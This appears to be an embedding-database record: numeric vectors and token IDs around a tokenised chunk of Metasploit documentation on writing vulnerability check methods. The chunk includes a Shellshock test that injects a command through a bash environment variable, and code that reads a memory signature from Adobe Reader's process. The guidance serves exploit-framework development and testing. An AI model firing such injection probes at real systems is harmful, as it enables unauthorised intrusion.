-0.48285579681396484, -0.11272311955690384, -0.5887647271156311, -0.20931664109230042, -0.6035372018814087, -0.4295462965965271, 0.30255940556526184, -0.11087117344141006, 0.01996329240500927, -0.43792200088500977, -0.4970734119415283, -0.5076243877410889, -0.2396683543920517, 0.28134119510650635, -0.5526857972145081, -0.19138342142105103, -0.6775389313697815, 0.1953345090150833, 0.10339655727148056, 0.3603332042694092, -0.10718384385108948, 0.5557552576065063, -0.10148791968822479, -0.09296537935733795, 0.7432706356048584, -0.48100745677948, -0.6897360682487488, 0.5703372955322266, -0.13372071087360382, -0.5341273546218872, 0.10077143460512161, 0.6143754124641418, -0.11091545224189758, 0.38822683691978455, 0.02002096362411976, -0.3512451648712158, -0.5880334377288818, -0.47124624252319336, -0.10355663299560547, -0.1637151539325714, 0.007471650838851929, -0.7866265773773193, -0.3281956911087036, -0.21048225462436676, 0.6300790309906006, 0.21115639805793762, -0.892737627029419, -0.3230368196964264, -0.15438391268253326, 0.2729192078113556, 0.20710764825344086, -0.14523281157016754, 0.10301366448402405, -0.6552056670188904, 0.06494360417127609, 0.37502285838127136, -0.16873736679553986, 0.06648457795381546, -0.49120938777923584, 0.03054942563176155, 0.21225835382938385, -0.02680906653404236, -0.3803721070289612, -0.39405396580696106, -0.37962254881858826, -0.018656879663467407, -0.8051445484161377, 0.39702531695365906, -0.1986062377691269, 0.4259285628795624, 0.17707180976867676, 0.16700081527233124, -0.15403933823108673, 0.33530494570732117, 0.379355251789093, 0.5350955128669739, 0.22910653054714203, -0.4801536202430725, 0.23774775862693787, -0.23819106817245483, 0.47988006472587585, 0.2555917203426361, -0.23345252871513367, -0.6984369158744812, 0.08959505707025528, -0.46916472911834717, -0.8562679290771484, 0.35069188475608826, 0.11554247885942459, -0.06523554027080536, 0.14605584740638733, -0.4346559941768646, 0.7724139094352722, -0.07663451880216599, -0.18843477964401245, 0.4827108085155487, 0.11729045957326889, 0.05011903867125511, -0.3319796323776245, 0.08066193759441376, 0.33354446291923523, 0.1980898231267929, 0.10716798156499863, 0.17233939468860626, 0.21188533306121826, -0.019764043390750885, -0.24021992087364197, 0.10302475839853287, -0.35289233922958374, -0.3803950548171997, 0.19816461205482483, -0.005366656929254532, 0.5629941821098328, -0.3669850826263428, -0.6528942584991455, -0.409322589635849, -0.029838770627975464, 0.0013098639901727438, -0.5648979544639587, 0.26127398014068604, 0.6392173767089844, 0.47391530871391296, -0.8031864166259766, 0.4903750717639923, -0.17840945720672607, 0.06951355934143066, 0.45818692445755005, 0.1726990044116974, -0.549673855304718, 0.9446503520011902, 0.19546504318714142, -0.9894692301750183, -0.4871135950088501, -0.9277909994125366, -0.20180268585681915, 0.19671569764614105, -0.4838230609893799, -0.1329294741153717, -0.29171332716941833, 0.3639924228191376, 0.21340890228748322, 0.585529088973999, 0.01502163801342249, 0.4889843165874481, -0.46299999952316284, 0.1696598380804062, 0.013802683912217617, 0.28487256169319153, 1.0801290273666382, -0.06974626332521439, -0.1807904988527298, -0.6237505078315735, -0.5003854632377625, 0.28795114159584045, -0.03606688231229782, 0.7745428085327148, 0.016300944611430168, 0.05701664835214615, 0.0965842753648758, 0.47654443979263306, 0.359049916267395, 0.11564193665981293, 0.28271418809890747, 1.3169606924057007, 0.31932947039604187, -0.3217887580394745, -0.3815430998802185, -0.037761807441711426, 0.1830115169286728, 0.5374881625175476, -0.3693050444126129, -0.10433070361614227, -0.022364133968949318, -0.10688714683055878, -0.05384783074259758, -0.40659984946250916, -0.7811928987503052, -0.7487122416496277, -0.640377938747406, 0.25796055793762207, -0.05994635447859764, 0.0356043204665184, 0.21223393082618713, -0.5649079084396362, -0.2538612484931946, -0.2845459580421448, 0.4409085214138031, -0.2780475616455078, -0.11716865003108978, -0.20489656925201416, 0.5100072026252747, -0.6764780879020691, -0.6564748287200928, -0.5047573447227478, -0.3302544355392456, -0.7775641679763794, -0.5800992846488953, -0.32706648111343384, -0.30351966619491577, -0.5423511266708374, 0.3841434419155121, -0.46909499168395996, -0.25999143719673157, 0.06693258136510849, -0.6918203830718994, 0.37943845987319946, 0.7702882289886475, -0.47100621461868286, 0.1568164974451065, 0.08835354447364807, 0.16453704237937927, 0.20750126242637634, -0.5038473010063171, 0.03673740476369858, -0.04827609285712242, 0.12298718839883804, 0.5679154992103577, 0.5237467885017395, 0.10322530567646027, 0.4626237750053406, -0.33548039197921753, -0.6795504093170166, -0.15942120552062988, -0.7210873961448669, -0.6399746537208557, 0.4201229214668274, -0.3085465729236603, 0.4016701579093933, 0.35513219237327576, 0.2504480481147766, 0.5120306611061096, -0.4254637658596039, 0.6511804461479187, 0.3617895841598511, 0.4203169345855713, 0.17732402682304382, 0.5160762071609497, -0.25335922837257385, -0.1117175742983818, 0.11056392639875412, 0.30904945731163025, -0.4286228120326996, 0.28299403190612793, 0.023833289742469788, -0.10122625529766083, -0.06442631036043167, -0.03386996313929558, -0.05605703964829445, 0.6090736985206604, 0.4513078033924103, 0.3116946816444397, 0.7218037843704224, 0.00236802757717669, -0.6188055276870728, 0.40709927678108215, -0.9328410029411316, 0.27315860986709595, 0.22010251879692078, -0.05450557544827461, -0.20742760598659515, -0.34339237213134766, 0.012861482799053192, -0.40955373644828796, 0.2690266966819763, -0.01583542674779892, 0.5755823850631714, 0.2837385833263397, -0.19407391548156738, 0.9384323954582214, -0.2834198772907257, -0.3045957684516907, -0.33189818263053894, 0.0726717859506607, -0.4692375361919403, -0.9035654067993164, 0.029235193505883217, 0.7911568284034729, 0.3359985053539276, -0.0264520812779665, -0.08665317296981812, -0.06312485784292221, 0.054548319429159164, -0.03868595138192177, -0.019596941769123077, 0.535159170627594, -0.6751182675361633, 0.4691234529018402, -0.5028238296508789, -0.06078869104385376, 0.33405622839927673, -0.18087631464004517, 0.44552287459373474, 0.058299172669649124, -0.4079195559024811, 0.5543394684791565, -0.014873304404318333, 0.012080127373337746, 0.6935699582099915, 1.1384419202804565, 0.48241502046585083, -0.2959175705909729, 0.19607026875019073, -0.33656206727027893, 0.4251220226287842, -0.18100512027740479, 0.16306878626346588, -0.372439980506897, 0.09170617163181305, 0.19387397170066833, -0.9667506217956543, -0.05777616426348686, 0.6922986507415771, -0.14820323884487152, -0.4151407778263092, -0.24256324768066406, -0.1543414294719696, 0.13580229878425598, 0.010871993377804756, -0.2314416915178299, 0.5453219413757324, -0.0941726490855217, 0.3334134519100189, 0.006355267949402332, -0.4482010006904602, 0.8838943243026733, -0.35245031118392944, 0.758721113204956, -0.22075693309307098, -0.13715839385986328, 0.2666834890842438, -0.25282400846481323, -0.7173832058906555, 0.5618347525596619, 1.0086870193481445, 0.4007400870323181, -0.6465558409690857, 0.4719293415546417, -0.4590962827205658, 0.4683912396430969, 0.08361204713582993, -0.3728206753730774, -0.47325679659843445, 0.172216534614563, 0.09225340932607651, -0.7535877823829651, -0.44878068566322327, 0.13703808188438416, 0.1971607506275177, 0.05876357853412628, 0.17624616622924805, 0.29964175820350647, 0.7760428190231323, -0.11951941251754761, 0.4996644854545593, -0.5829390287399292, 0.12602227926254272, 0.06872972846031189, -0.19769130647182465, -0.7238759398460388, 0.9197003841400146, 0.36369356513023376, 0.5165152549743652, 0.04282907396554947, 0.49752599000930786, -0.03275201469659805, 0.2445712685585022, -0.04149053990840912, -0.664333701133728, -0.4824672341346741, -0.19521291553974152, -0.005770068150013685, -0.4329794645309448, 0.1334591954946518, 0.0978284478187561, 0.5429795384407043, -0.3278559148311615, -0.13166704773902893, -0.08783326297998428, -0.1519753783941269, -0.23225842416286469, -0.4807277023792267, 0.4298951029777527, 0.414853572845459, -0.7535852193832397, -0.18455882370471954, 0.16421811282634735, 0.1388486921787262, 0.2613648474216461, -0.37876057624816895, -0.6942055225372314, -0.5095323324203491, 0.02500435709953308, -0.27712109684944153, 0.8046725988388062, -0.34580644965171814, -0.05031443014740944, 0.31768253445625305, -0.445463091135025, -0.6574506759643555, -0.3107474744319916, -0.6581406593322754, -0.03092893585562706, 0.5248460173606873, 0.5740957260131836, 0.1883114129304886, 0.6130096912384033, -0.41436898708343506, 0.1296795904636383, 0.14424172043800354, 0.33176738023757935, -0.016557935625314713, 0.5577061176300049, 0.4949456453323364, 0.220863938331604, -0.11692976951599121, -0.39889460802078247, 0.4057747423648834, -0.09003634005784988, -0.24686439335346222, -0.3162303566932678, -0.11663657426834106, -0.8292800784111023, -0.1279623955488205, 0.3215912878513336, -0.19832763075828552, -0.32272613048553467, 0.003175527323037386, -0.9186974167823792, -0.08854420483112335, -0.2706567943096161, -0.20403094589710236, -0.1466645896434784, 0.0018232181901112199, 0.14564065635204315, -0.3837059736251831, 0.9320310354232788, -0.8048945665359497, 4.687321662902832, -0.009716525673866272, -0.12879328429698944, -0.25589078664779663, 0.302726686000824, 0.6930633187294006, 0.5339134931564331, -0.4116138219833374, 0.4473162889480591, -0.33468684554100037, -0.007560596335679293, 0.24248601496219635, 0.09874369949102402, 0.6029897928237915, 0.23795175552368164, 0.0645613744854927, -0.6790642738342285, 0.02124934270977974, -0.25428473949432373, -0.9502076506614685, -0.8547962307929993, 0.22016172111034393, -0.1999749094247818, 0.5974025726318359, 0.25190088152885437, 0.3602652847766876, 0.3817397952079773, -0.8450623154640198, -0.027773065492510796, -0.27811601758003235, 0.014217833988368511, -0.051086973398923874, 0.152872696518898, -0.5839073657989502, -0.42777538299560547, 0.03326111286878586, -0.05370352417230606, -0.2381770759820938, -0.8420690298080444, -0.581345796585083, 0.9636746048927307, 0.48177215456962585, -0.06085142493247986, -0.39870065450668335, 0.4096350371837616, 0.4220828115940094, -0.7018691897392273, 0.060316916555166245, 0.25245141983032227, -0.35732316970825195, 0.7915068864822388, 0.10462221503257751, 0.7914907932281494, -0.16367973387241364, -0.38667458295822144, 0.5269215106964111, 0.3944692313671112, 0.11811264604330063, 0.15146797895431519, 0.05183811113238335, -0.02205992490053177, -0.5628787875175476, 0.30332615971565247, 0.04647953435778618, -0.7463128566741943, 0.5627562403678894, -0.3910304009914398, 0.06801942735910416, -0.03747633472084999, -0.06731761991977692, -0.38609299063682556, 0.00034388701897114515, -0.5204039812088013, -0.7785991430282593, 0.4012448489665985, -0.23048973083496094, -0.21016553044319153, 0.10409010201692581, 0.8525087237358093, -0.26313433051109314, -0.2104368954896927, -0.5148904919624329, -0.5801603198051453, 0.8049156665802002, 0.703119695186615, 0.30153200030326843, -0.05544658750295639, -0.7742757201194763, 0.13831736147403717, 0.04167244955897331, 0.2950685918331146, 0.510371744632721, -0.21691279113292694, 0.3884568214416504, 0.04994286969304085 ]
[ 2008, 1521, 1055, 2124, 2000, 2022, 8211, 1012, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 8211, 2239, 2135, 2109, 2065, 1996, 4638, 2003, 2583, 2000, 2941, 2202, 5056, 1997, 1996, 11829, 1010, 1998, 6855, 2070, 4066, 1997, 2524, 3350, 1012, 2005, 2742, 1024, 2005, 1037, 3094, 7781, 2828, 11829, 1010, 2131, 1037, 3094, 6434, 2013, 1996, 4539, 2291, 1012, 2005, 1037, 14176, 29053, 2389, 1010, 3191, 1037, 5371, 2013, 1996, 4539, 1010, 4385, 1012, 2144, 2023, 2504, 1997, 4638, 2003, 3492, 9376, 1999, 3267, 1010, 2017, 2323, 2025, 3046, 2000, 9998, 1996, 3677, 2004, 1037, 2126, 2000, 6011, 1996, 18130, 1012, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 4895, 6342, 9397, 15613, 10760, 18077, 2515, 2025, 2490, 1996, 4638, 4118, 1012, 2065, 2023, 2003, 1996, 2553, 1010, 2059, 2017, 2123, 1521, 1056, 2428, 2031, 2000, 5587, 1996, 4638, 4118, 1012, 1996, 4638, 16044, 2036, 6753, 2019, 11887, 6412, 2029, 2003, 6267, 2011, 1996, 7705, 2588, 6503, 1997, 1996, 4638, 4118, 1012, 2005, 2742, 1024, 2709, 4638, 16044, 1024, 1024, 3544, 1006, 1005, 8211, 6922, 1060, 2100, 2480, 2003, 5361, 1005, 1007, 18804, 13102, 4135, 4183, 5302, 8566, 2571, 1001, 4638, 4725, 2323, 5425, 2151, 2124, 5333, 2013, 4725, 2170, 1998, 2709, 3643, 1997, 2465, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 4638, 16044, 1012, 10468, 1010, 2008, 2965, 9992, 1996, 2224, 1997, 8246, 1035, 2007, 2030, 6274, 11790, 2008, 2024, 2025, 8971, 2306, 1996, 4638, 4118, 1012, 6556, 4638, 2742, 5886, 2063, 1521, 1055, 2019, 10061, 2742, 1997, 2129, 1037, 18804, 13102, 4135, 4183, 4638, 2453, 2022, 2517, 1024, 1001, 1001, 5651, 1037, 4638, 3642, 2008, 7127, 1996, 8211, 2110, 2006, 2019, 10439, 2770, 2006, 9808, 1060, 1001, 13366, 4638, 2065, 4654, 8586, 1035, 4642, 2094, 1035, 3081, 1035, 8299, 1006, 1000, 8909, 1000, 1007, 1027, 1066, 1013, 21318, 2094, 1027, 1032, 1040, 1009, 1032, 1006, 1012, 1009, 1032, 1007, 1013, 1001, 2179, 1996, 6149, 8909, 6434, 1010, 2204, 8131, 2256, 3094, 6472, 2709, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 8211, 2203, 24471, 2140, 1027, 2131, 1035, 24471, 2140, 2065, 24471, 2140, 2065, 24471, 2140, 1027, 1066, 1013, 2242, 4642, 2015, 1058, 2487, 1032, 1012, 1014, 1013, 1001, 2057, 2024, 2583, 2000, 2424, 1996, 2544, 3568, 2062, 10480, 2055, 1996, 24728, 19666, 2110, 2709, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 3544, 3449, 5332, 2546, 24471, 2140, 1027, 1066, 1013, 2242, 4642, 2015, 1013, 1001, 2035, 2057, 2064, 2425, 1996, 8211, 10439, 2003, 2770, 1010, 2021, 2053, 2062, 18558, 2000, 1001, 5646, 1996, 24728, 19666, 2709, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 11156, 2203, 2842, 21210, 6657, 2102, 1035, 7561, 1006, 1000, 4039, 2000, 5646, 2349, 2000, 1037, 8299, 4434, 2051, 5833, 1000, 1007, 2709, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 4242, 2203, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 3647, 2203, 3602, 1024, 2065, 2017, 2024, 3015, 2019, 9830, 11336, 2007, 1996, 5796, 2546, 1024, 1024, 9830, 1024, 1024, 26221, 4666, 2378, 1010, 2017, 2323, 13520, 2115, 4638, 4118, 2066, 2023, 1024, 13366, 4638, 1035, 3677, 1006, 12997, 1007, 1001, 2079, 2115, 2518, 2203, 2334, 18077, 4638, 2742 ]
metasploit
108.txt
1
##most local exploit checks are done by checking the version of the vulnerable file, which is considered passive, therefore they should be flagging exploit : : checkcode : : appears. passive local exploit checks don ’ t necessarily mean they are less reliable, in fact, they are not bad. but to qualify for exploit : : checkcode : : vulnerable, your check should do the extra mile, which means either you somehow make the program return a vulnerable response, or you inspect the vulnerable code. an example of making the program return a vulnerable response is shellshock ( the following is specific for vmware ) : def check check _ str = rex : : text. rand _ text _ alphanumeric ( 5 ) # ensure they are vulnerable to bash env variable bug if cmd _ exec ( " env x ='( ) { : ; } ; echo # { check _ str }'bash - c echo " ). include? ( check _ str ) & & cmd _ exec ( " file'# { datastore ['vmware _ path'] }'" )! ~ / cannot open / exploit : : checkcode : : vulnerable else exploit : : checkcode : : safe end end one way to inspect the vulnerable code is to come up with a signature, and see if it exists in the vulnerable process. here ’ s an example with adobe _ sandbox _ adobecollabsync. rb : #'adobecollabsynctriggersignature'= > " \ x56 \ x68 \ xbc \ x00 \ x00 \ x00 \ xe8 \ xf5 \ xfd \ xff \ xff " #'adobecollabsynctrigger'= > 0x18fa0 def check _ trigger signature = session. railgun. memread ( @ addresses ['acrord32. exe'] + target ['adobecollabsynctrigger'], target ['adobecollabsynctriggersignature']. length ) if signature = = target ['adobecollabsynctriggersignature'] return true end return false end def check @ addresses = { } acrord32 = session. railgun. kernel32. getmodulehandlea ( " acrord32. exe " ) @ addresses ['acrord32. exe'] = acrord32 [ "
[ -0.055596452206373215, 0.04811377450823784, -0.1488029509782791, 0.3776251971721649, -0.22113707661628723, -0.1877438724040985, -0.7237312197685242, -0.02366589568555355, 0.25365859270095825, 0.867485523223877, 0.04207877069711685, -0.17411406338214874, 0.2608295977115631, -0.5239649415016174, -0.5818127989768982, -0.8041243553161621, -0.2544720470905304, -0.5658040046691895, -0.9405615925788879, 0.5262506008148193, 0.4440280497074127, -0.4268990159034729, -0.4005609452724457, -0.18630065023899078, -0.815250039100647, 0.41735467314720154, 0.7000162601470947, -0.14044088125228882, 0.26050233840942383, 0.49703648686408997, 0.5661973357200623, -0.03745107725262642, -0.29134801030158997, -0.6032469868659973, 0.6353362798690796, -0.2968886196613312, 0.8963878154754639, -0.34643790125846863, -0.007964628748595715, -0.8186007738113403, -0.2422616183757782, 0.23241423070430756, 0.23336352407932281, -0.609041690826416, -0.8567309975624084, -0.2252122163772583, -0.2074204534292221, 0.1547509878873825, 1.1902707815170288, -0.21259628236293793, 0.5101945400238037, 0.9777255654335022, 0.13667383790016174, 0.1324329823255539, 0.21755501627922058, -0.4459691345691681, -0.0512017123401165, 0.10274030268192291, -0.006343761924654245, 0.06675488501787186, -0.10258392989635468, 0.4814409911632538, -0.05604495480656624, -0.6282827854156494, 0.2613677680492401, 0.8720932006835938, -0.1884300261735916, -0.3775302767753601, 0.028920551761984825, -0.2391015589237213, 0.061506081372499466, 0.3904592990875244, -0.6203191876411438, -0.29136908054351807, -0.6264404654502869, -0.2300819307565689, 0.18598830699920654, -0.019497841596603394, -0.2434619516134262, 0.669741153717041, -0.21348945796489716, 1.3935267925262451, 0.07499286532402039, -0.19181528687477112, -0.02879330888390541, -0.7187021374702454, 0.48025763034820557, 0.4056495130062103, -0.655458390712738, 0.2811598777770996, 0.6391538977622986, 0.4968469738960266, -0.48460114002227783, -0.05279840901494026, 0.8664255142211914, 0.8649677038192749, -0.569700300693512, -0.005977243650704622, 0.2471259981393814, 0.042254045605659485, 1.101943850517273, 1.0236316919326782, -0.09191644936800003, 0.10409737378358841, -0.265188068151474, 0.5375277400016785, 0.6437483429908752, -0.20376740396022797, -0.48320990800857544, -0.44344642758369446, 0.22726784646511078, 0.03532419353723526, -0.19883306324481964, -1.2439266443252563, -0.4849901795387268, 0.7369407415390015, 0.12222526967525482, -0.2517712712287903, -0.3999183773994446, 0.14424604177474976, -0.0860590934753418, -0.3321898877620697, 0.14337106049060822, -0.4569966793060303, 0.34662529826164246, -0.22369906306266785, 0.37498173117637634, 0.45939475297927856, -0.3338128924369812, -0.08735976368188858, -0.5748718976974487, -0.029900092631578445, -0.28157418966293335, 0.6435799598693848, -0.8732287287712097, 0.3467584252357483, 0.1615576148033142, 0.04525638371706009, 0.7132968902587891, -1.1973806619644165, 0.4360410273075104, 0.2892530858516693, 0.4144304692745209, 1.017791509628296, -0.023782385513186455, -0.6442795991897583, -0.20380690693855286, -0.3223017752170563, 0.10559006035327911, 1.370048999786377, -0.3648521900177002, -0.03938472643494606, 0.5361531376838684, -0.13059483468532562, -1.0083116292953491, -0.14924512803554535, -0.8443419933319092, 1.0024126768112183, -0.22232218086719513, 0.08297010511159897, 0.19530019164085388, 1.1804981231689453, -0.006353224627673626, 0.2229878008365631, -0.273131787776947, 0.25689834356307983, -0.4959923028945923, -0.3413933515548706, -0.4757341742515564, 0.3025827407836914, 0.761323094367981, 0.46067026257514954, 0.3453685939311981, 0.563244640827179, 1.5247570276260376, 0.6345836520195007, -0.038967639207839966, -0.744286060333252, -0.03225984796881676, 0.41309261322021484, -0.7351495623588562, 0.2637423872947693, -0.01170272659510374, 1.0783733129501343, -0.01924610137939453, 0.04244324564933777, 0.3897395431995392, -0.6428796052932739, -0.17225629091262817, -0.1824534833431244, -0.04072760045528412, 1.03236985206604, -0.8205052614212036, 0.5896840691566467, 0.8561946749687195, -0.7126557230949402, -1.199123740196228, -0.30019769072532654, -0.2847825884819031, -1.6179882287979126, -0.606106162071228, 0.22205275297164917, 0.1607637107372284, 0.4463288187980652, -0.5868052244186401, -0.6346545219421387, 0.7514560222625732, 0.6764398813247681, -0.19812777638435364, -0.023493289947509766, 1.0862270593643188, -0.7609685063362122, -0.5436611771583557, 0.5966548919677734, 0.309520423412323, 0.2513046860694885, -0.4822675287723541, 0.19884835183620453, 0.2699294984340668, 0.5838493704795837, -0.15596625208854675, 0.8739138245582581, 0.6269099712371826, 0.5470648407936096, -0.5416174530982971, 0.2545106112957001, 0.08043646812438965, 0.3920115828514099, -0.16071100533008575, -0.047328315675258636, 0.015465903095901012, 0.39255568385124207, 0.47830551862716675, 0.738168478012085, 0.23381084203720093, 0.14035597443580627, 0.04780258610844612, 0.0716872289776802, -0.22127896547317505, 0.05265723913908005, -0.27527526021003723, 0.8174528479576111, 0.1803554892539978, 0.8152316808700562, 0.3186817467212677, -0.06603650748729706, 0.41890057921409607, 0.11703413724899292, 0.1646047979593277, 1.1473703384399414, -0.6531996130943298, 1.0529524087905884, 0.5262757539749146, -0.14436005055904388, -0.36368438601493835, -0.7490329146385193, 0.5021618008613586, 0.8345926403999329, -0.6813332438468933, -0.3183966875076294, 0.17947432398796082, -0.4007647633552551, -0.3294898271560669, -0.09639828652143478, 0.11105120182037354, 0.5090385675430298, 0.4463668465614319, 0.2026212513446808, -0.7470554709434509, -0.6631318926811218, -0.9018651843070984, -0.3732939660549164, -1.206636905670166, -0.8137915730476379, -1.2721189260482788, 0.6443588733673096, 0.008588636294007301, -0.5279056429862976, 0.638670802116394, -1.0403556823730469, -0.7553247213363647, -0.24290548264980316, -0.07780272513628006, 0.605758786201477, 0.20620015263557434, 0.1541016846895218, -1.1839889287948608, -0.16114972531795502, 0.05695545673370361, 0.5866612195968628, -0.5095545649528503, -0.27706071734428406, 0.0881415531039238, 0.0493428111076355, 0.10696931928396225, -0.2686009109020233, 0.8094236254692078, -0.0012199702905490994, 0.21830667555332184, -0.6187078356742859, 0.07942751049995422, -0.2600559592247009, -0.3544210195541382, -0.04520871862769127, -0.42461448907852173, 0.5669052004814148, -0.3402893543243408, -0.11991948634386063, 0.4441450536251068, 0.5455648303031921, -0.2141694724559784, 0.27066075801849365, -0.35528382658958435, 0.6866152286529541, -0.3416770398616791, 0.8417670726776123, 0.1670432835817337, 0.30368250608444214, -0.21815599501132965, -0.30784371495246887, -0.07224143296480179, -0.4178357422351837, -0.5577918887138367, -0.1627674102783203, -0.9074892997741699, 0.5841456651687622, 0.4508076310157776, -1.422980546951294, 0.07778063416481018, -0.7740635275840759, -0.3110335171222687, -0.28245311975479126, 0.07630626857280731, 1.5533865690231323, 0.3057463467121124, 0.5515568852424622, -0.29084253311157227, 0.40048351883888245, -0.0636901929974556, 0.18944528698921204, 0.16853021085262299, -0.6601446866989136, 0.7245537042617798, 0.023405561223626137, 0.16104444861412048, 0.9306146502494812, 0.07228758931159973, -0.18087299168109894, -0.1205398291349411, -0.4071061611175537, -0.012927353382110596, 0.25444677472114563, 0.09051425009965897, 0.04083719104528427, -0.6627785563468933, 1.0694432258605957, -0.5870576500892639, -0.2760445475578308, 0.1437869518995285, 0.015213077887892723, 0.1985054463148117, -0.09509854018688202, 0.2728286683559418, -0.08788320422172546, -0.23202447593212128, -0.7822955846786499, -0.2591153085231781, -0.49492883682250977, 0.5785911679267883, 0.30645695328712463, 0.01685752160847187, 0.14914098381996155, -0.044721346348524094, -0.06404491513967514, -0.14594726264476776, -0.6032520532608032, 0.31712573766708374, -0.08550902456045151, 0.7216341495513916, -0.28555572032928467, 0.11058414727449417, -0.7782601714134216, 0.3206983208656311, 0.4105406105518341, -0.24241237342357635, -0.6809298992156982, -0.19955095648765564, -0.6885842084884644, -0.30255720019340515, 0.06724796444177628, -0.16673137247562408, -0.38028857111930847, 0.6586685180664062, -0.9710342884063721, -0.2067984938621521, -1.1807303428649902, 0.9100865125656128, 0.5722935199737549, 0.7229114770889282, 0.49253326654434204, 0.1814458817243576, -0.04190480336546898, -0.14046351611614227, 0.5844148993492126, -0.48627275228500366, 0.24295857548713684, -0.5607277750968933, 0.42260855436325073, -0.18107633292675018, 0.12653879821300507, -0.16345098614692688, 0.36329200863838196, -0.27594807744026184, -0.24917124211788177, 0.058340009301900864, -0.1562197357416153, -0.35839009284973145, 0.5404691100120544, 0.2018364816904068, -0.3150187134742737, -0.6024516224861145, -0.5149849653244019, -0.2584215998649597, 0.0031663617119193077, 1.082948923110962, -0.4261121451854706, 0.4846562147140503, -0.6162848472595215, 0.16863802075386047, 0.9726335406303406, 0.34326761960983276, -0.4092673361301422, -0.765617847442627, -0.6508227586746216, -0.832152783870697, -0.5822868347167969, 0.6499513983726501, -0.15451842546463013, 0.17087601125240326, -0.9182201623916626, -0.15739542245864868, 0.4889076054096222, 0.0006966324290260673, -0.9472864270210266, -0.09311357140541077, -0.11048274487257004, 0.5264206528663635, 0.5102525949478149, -0.7071374654769897, -0.5114315748214722, 0.30721333622932434, -0.8542191982269287, 0.5440369248390198, -0.784363865852356, 0.35743626952171326, 0.6345731616020203, 0.6812846064567566, -0.4586261510848999, 0.2500338554382324, -0.42672550678253174, -0.23550613224506378, -0.2109389305114746, 0.2370191216468811, -0.8165721297264099, 0.22485238313674927, 0.06761801987886429, -0.22466076910495758, 0.2134144902229309, 0.2361954301595688, 0.1807245910167694, 0.06053576618432999, 0.6136277318000793, -0.4463977515697479, -0.22599704563617706, 0.29830461740493774, -0.4406035840511322, 0.5063689351081848, 1.0785496234893799, 0.629906952381134, -0.06474948674440384, -0.5323878526687622, 1.2552062273025513, -0.008069596253335476, 0.10747268050909042, -0.9270923137664795, -0.49384286999702454, -0.12684276700019836, 0.23870375752449036, 0.08245594054460526, 0.4971754550933838, -0.21823090314865112, 0.061250343918800354, -0.6824512481689453, -0.026270026341080666, -0.5783674716949463, -0.513526439666748, -0.3796154260635376, -0.08940955251455307, 0.30783650279045105, 0.16438618302345276, 0.1621413230895996, -0.5948572158813477, -0.7562363147735596, -0.1991848200559616, -0.07573366910219193, 0.228873148560524, -1.488104224205017, 0.46352314949035645, -0.22199197113513947, 0.013118804432451725, -0.3419150710105896, 0.548857569694519, -0.6187978982925415, 0.25634923577308655, 0.041190069168806076, 0.23046229779720306, 0.7038112282752991, -0.400566965341568, -0.9094154834747314, 0.8003012537956238, 0.055678967386484146, -0.9420369267463684, 0.07355963438749313, 0.24961167573928833, -0.5929544568061829, 0.60397869348526, -0.7879810929298401, -0.7705894708633423, -0.8185980319976807, -1.0012102127075195, -0.2160349190235138, -0.7955808043479919, 0.26977643370628357, -0.7310908436775208, -0.20256778597831726, -0.9894817471504211, 0.567036509513855, 0.2523772120475769, -0.8627825379371643, -0.022473230957984924, 0.27514803409576416, -0.4249899089336395, -0.07826930284500122, -0.0701574832201004, -0.47032126784324646, -0.46246612071990967, 0.04347337409853935, 0.8847050070762634, -0.06225653737783432, -0.03927264362573624, -0.7068071961402893, 0.6954262256622314, 0.5748998522758484, -0.23032842576503754, -0.5565148591995239, 0.055380117148160934, -0.7345864772796631, -0.048588935285806656, -0.3250567317008972, 1.1831551790237427, -0.9826632142066956, 0.41875118017196655, 0.114546038210392, 0.29038503766059875, 0.057893525809049606, 0.07329536229372025, 0.6042802929878235, 1.0226994752883911, 0.5852252244949341, -0.22692205011844635, 0.7152564525604248, -0.514975368976593, 0.6619988083839417, 0.37155652046203613, 0.18965540826320648, -0.05976182967424393, -0.3280373811721802, -0.42605337500572205, -1.4172875881195068, 1.0054945945739746, 0.4228633642196655, -0.4859847128391266, 0.015334629453718662, -0.0110907182097435, 0.4831164479255676, -0.4201194941997528, 0.020966563373804092, 0.7104918956756592, 0.741660475730896, -0.21561095118522644, -0.8454046249389648, 0.34806492924690247, 0.3329025208950043, -0.2525833547115326, -0.013569067232310772, 0.03567121922969818, 0.30207085609436035, 0.027293723076581955, -0.38333168625831604, -0.20242208242416382, -0.5521435737609863, -0.5132473111152649, 0.5747554302215576, 0.20909583568572998, 1.0541832447052002, 0.006262305658310652, -0.8440569639205933, -0.6659654378890991, -0.338084876537323, -0.05286620557308197, -0.3503023386001587, 0.14464683830738068, 0.6470285058021545, 0.9235818982124329, -0.20565226674079895, -0.3968416750431061, -0.4290692210197449, -0.09363535791635513, 0.8812411427497864, -0.24765662848949432, -0.5915852785110474, 0.8991124033927917, 0.20191951096057892, -0.9655982255935669, -0.3629658818244934, -0.8550995588302612, -0.18640728294849396, 0.4416120648384094, -0.7580621838569641, -0.25758618116378784, 0.11237075179815292, -0.25042760372161865, 0.3949156403541565, 0.7915157079696655, -0.13505758345127106, 0.3020053505897522, -0.42983490228652954, 0.3135479986667633, -0.17835471034049988, 0.3506464660167694, 0.7426151633262634, -0.6922779679298401, -0.47111475467681885, -1.0595208406448364, 0.19859227538108826, 0.2755352258682251, -0.06710752099752426, 0.9169708490371704, -0.3009766638278961, -0.20522695779800415, 0.39983946084976196, 0.33845585584640503, 0.5978359580039978, 0.11513209342956543, 0.4282110333442688, 0.31555065512657166, -0.04347000643610954, -0.4694056808948517, -0.7255266308784485, -0.36257851123809814, -0.22064337134361267, 0.6273661255836487, -0.8033097386360168, -0.08502248674631119, -0.293824702501297, -0.041215408593416214, -0.30092060565948486, -0.5664876103401184, -0.5882417559623718, -0.589179277420044, -0.18299734592437744, 0.2844442129135132, -0.16036859154701233, 0.060359299182891846, 0.1751323640346527, -0.3305486738681793, -0.33562085032463074, -0.20307578146457672, 0.11103332787752151, -0.47568196058273315, -0.19742199778556824, -1.314412236213684, 0.6485074162483215, -0.6490451693534851, -0.6546072959899902, -0.465733140707016, -0.5316883325576782, -0.17073757946491241, -0.7150827050209045, -0.07530602067708969, -0.035723477602005005, -0.4260023832321167, 0.7838441729545593, -0.39468422532081604, -0.21508421003818512, 